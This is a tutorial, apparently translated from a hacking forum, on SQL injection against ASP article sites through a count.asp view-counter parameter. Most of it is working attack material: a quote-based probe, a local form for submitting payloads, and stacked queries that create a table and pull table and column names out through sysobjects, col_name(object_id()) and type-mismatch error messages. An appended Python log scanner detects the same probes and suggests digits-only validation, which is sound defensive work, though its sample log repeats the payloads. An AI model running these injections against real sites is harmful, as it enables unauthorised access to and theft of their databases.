Have you ever encountered a website like this:
The whole article system uses FSO to generate static HTML files for display.
This reduces the server load and increases access speed.
Second, it is also supposed to block SQL injection attacks...
Let me explain how such an article system works:
Every article has a copy in the database; in addition, an HTML page is generated from a template.
Attack method:
Check the page source to see whether any page is called through JavaScript.
For example, <script language="JavaScript" src="count.asp?id=1552"></script> is called to update an article's view count.
We can try to see whether injection is possible:
http://server domain name/count.asp?id=1552'
Check whether an error occurs. If an error occurs, the injection vulnerability exists.
Then the attack proceeds as usual.
Create a post.htm file and a log.txt text file on the local machine (this is a good habit).
Contents of post.htm (this makes input easier to enter):
<iframe name="P" src="#" width="800" height="350" frameborder="0"></iframe>
<br>
<form action="http://test.com/count.asp" target="P">
<input name="ID" value="1552; update AAA set AAA=(select top 1 name from sysobjects where xtype='U' and status>0);--" style="width:750">
<input type="submit" value=">>>">
<input type="hidden" name="fno" value="2,3">
</form>
Whether the backend is SQL Server can be judged as follows: add a semicolon after 1552. If the page still behaves normally, it may be SQL Server.
For such a database, you can first create a table: id=1552; create table AAA (AAA char(20));--
Insert a record: id=1552; insert into AAA values ('test');--
Next, find out the names of its data tables:
id=1552; update AAA set AAA=(select top 1 name from sysobjects where xtype='U' and status>0);--
This updates the AAA field to the first table name.
id=1552 and exists (select * from AAA where AAA>5) will then cause an error. In most cases the table name can be read directly from the error message, for example:
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'Vote' to a column of data type int.
/search.asp, line 21
Here, Vote is the table name.
You can also guess a table name first, then update (select top 1 name from sysobjects where xtype='U' and status>0) into a record of that table so that it is displayed on the web page.
After the first table has been read, the second table can be read as follows (add "and name<>'the table name just obtained'" after the condition):
id=1552; update AAA set AAA=(select top 1 name from sysobjects where xtype='U' and status>0 and name<>'Vote');--
Then id=1552 and exists (select * from AAA where AAA>5)
reads the second table. Continue one by one until no table is left.
Fields are read as follows:
id=1552; update AAA set AAA=(select top 1 col_name(object_id('table name'),1));--
Then id=1552 and exists (select * from AAA where AAA>5) produces the error.
id=1552; update AAA set AAA=(select top 1 col_name(object_id('table name'),2));--
Then id=1552 and exists (select * from AAA where AAA>5) produces the error.
... and so on.
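Added example, not from the original post: a small Python detector that scans IIS W3C log lines for the count.asp?id= probes walked through above (a stray quote, stacked queries after ';', sysobjects and col_name(object_id()) enumeration, the exists(select ...) type-mismatch trick). The log field order, the timestamps and the IP addresses are assumptions, and the sample log lines are constructed.

```python
import re
from urllib.parse import quote, unquote_plus

# Regexes for the probes the post walks through (stacked query, schema enumeration, type mismatch, '--' tail).
SIGNATURES = {
    "stacked_query": re.compile(r";\s*(update|insert|create|drop)\b", re.I),
    "schema_probe": re.compile(r"\bsysobjects\b|\bcol_name\s*\(\s*object_id\s*\(", re.I),
    "type_mismatch": re.compile(r"\bexists\s*\(\s*select\b", re.I),
    "comment_tail": re.compile(r"--\s*$"),
}

def classify_id(value):
    """Reasons a decoded id value looks like a probe; a real article id is digits only."""
    if re.fullmatch(r"\d+", value.strip()):
        return []
    reasons = [name for name, pat in SIGNATURES.items() if pat.search(value)]
    if value.rstrip().endswith("'"):
        reasons.append("quote_probe")  # the post's first test: id=1552'
    return reasons or ["non_numeric_id"]

def _params(query):
    """Decode cs-uri-query by hand so a ';' inside a value is not taken as a separator."""
    pairs = []
    for part in query.split("&"):
        name, _, value = part.partition("=")
        pairs.append((unquote_plus(name).lower(), unquote_plus(value)))  # ASP names are case-insensitive
    return pairs

def scan_iis_log(lines):
    """Return (c-ip, cs-uri-stem, reasons) per suspicious request in W3C log lines with
    fields (assumed order): date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    hits = []
    for line in lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:  # skip directives and short lines
            continue
        for name, value in _params(fields[5]):
            if name == "id" and (reasons := classify_id(value)):
                hits.append((fields[2], fields[4], reasons))
    return hits

def _log(ip, query):  # constructed log line, query encoded the way IIS records it
    return f"2004-06-01 10:00:00 {ip} GET /count.asp {quote(query, safe='=&')} 200"

SAMPLE_LOG = [  # constructed sample: one normal request, then the post's own probes
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status",
    _log("10.0.0.5", "id=1552"),
    _log("10.0.0.9", "id=1552'"),
    _log("10.0.0.9", "id=1552; create table AAA (AAA char(20));--"),
    _log("10.0.0.9", "id=1552; update AAA set AAA=(select top 1 name from sysobjects where xtype='U' and status>0);--"),
    _log("10.0.0.9", "id=1552 and exists (select * from AAA where AAA>5)"),
    _log("10.0.0.9", "id=1552; update AAA set AAA=(select top 1 col_name(object_id('Vote'),1));--"),
]
```

The same digits-only check in classify_id is also the fix on the server side: count.asp should reject any id that is not a plain integer before it reaches the query.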